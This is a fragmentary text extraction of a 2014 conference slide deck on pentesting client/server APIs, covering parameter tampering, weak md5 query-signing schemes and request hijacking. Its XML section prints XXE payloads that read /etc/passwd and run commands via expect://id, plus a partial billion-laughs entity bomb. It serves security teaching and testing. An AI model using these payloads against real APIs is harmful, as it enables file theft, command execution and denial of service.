Pentesting client/server API. Sergey Belov

58  Download (0)

Full text

(1)
(2)

© 2002—2014, Digital Security

2

Senior Security Auditor at Digital Security

BugHunter: Google, Yandex, Badoo, Yahoo +++

Writer: habrahabr, Xakep magazine

CTF: DEFCON 2012 CTF Final, Chaos Construction

CTF’2013

Speaker: CodeFest 2012, ZeroNights 0x03

(3)

What are we talking about?

(4)

© 2002—2014, Digital Security

4

(5)
(6)
(7)

Hacking via API

(8)
(9)
(10)
(11)
(12)

© 2002—2014, Digital Security

12

What should we test?

Logic!

Bypassing restrictions (sqli/xss)

Parameter tampering

Developing

(13)
(14)

© 2002—2014, Digital Security

14

(15)

Hacking via API

(16)

© 2002—2014, Digital Security

16

42 Kb…

(17)

Hacking via API

42 Kb…

…10 Gb?

(18)

© 2002—2014, Digital Security

18

42 Kb…

…10 Gb?

…100 Gb?

(19)

Hacking via API

42 Kb…

…10 Gb?

…100 Gb?

(20)

© 2002—2014, Digital Security

20

Say

HELLO

to

(21)

Hacking via API

The evil of JavaScript

and

(22)
(23)
(24)

© 2002—2014, Digital Security

24

(25)

Hacking via API

(26)

© 2002—2014, Digital Security

26

Query signing

Sign = sha*(…+DATA+…)

(27)
(28)

© 2002—2014, Digital Security

28

(29)

Hacking via API

Say hello again.

(30)

© 2002—2014, Digital Security

30

A=1&B=2&C=3

07ce36c769ae130708258fb5dfa3d37ca5a67514

(31)

Hacking via API

(32)

© 2002—2014, Digital Security

32

What does the attacker know?

Original data

Sign (token)

(33)

Hacking via API

What does the attacker want?

(34)

© 2002—2014, Digital Security

34

(35)

Hacking via API

Can sign new query without API key!

Vkontakte: sig = md5(name1=value1name2=value2api_secret)

Mail.RU sig = md5(uid + params + private_key)

(36)

© 2002—2014, Digital Security

36

Request hijacking…

(37)
(38)
(39)
(40)
(41)
(42)
(43)
(44)
(45)

Hacking via API

(46)

© 2002—2014, Digital Security

46

DTD Example:

<!ENTITY writer "Donald Duck.">

<!ENTITY copyright "Copyright W3Schools.">

XML example:

(47)

Hacking via API

XML entities?

(48)

© 2002—2014, Digital Security

48

<!DOCTYPE foo [

<!ELEMENT foo ANY >

<!ENTITY xxe SYSTEM

"

file:///etc/passwd

" >]>

(49)

Hacking via API

<!DOCTYPE foo [

<!ELEMENT foo ANY >

<!ENTITY xxe SYSTEM

expect://id

" >]>

(50)

© 2002—2014, Digital Security

50

(51)

Hacking via API

<?xml

version="1.0"

?>

<!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz

(#PCDATA)

>

<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"

>

<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"

>

<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"

>

<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"

>

<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"

>

<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"

>

(52)

© 2002—2014, Digital Security

52

(53)

Hacking via API

(54)

© 2002—2014, Digital Security

54

(55)
(56)

© 2002—2014, Digital Security

56

Testing:

https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)

XXE to RCE https://gist.github.com/joernchen/3623896

Development:

(57)

Hacking via API

Finally:

Re-test all interface restrictions;

Specific compressions;

JS callbacks;

(58)

twitter.com/sergeybelove

sbelov@dsec.ru

Digital Security в Москве: (495) 223-07-86

Digital Security в Санкт-Петербурге: (812) 703-15-47

Thanks for your attention!

Questions?

Figure

Updating...

References

Related subjects :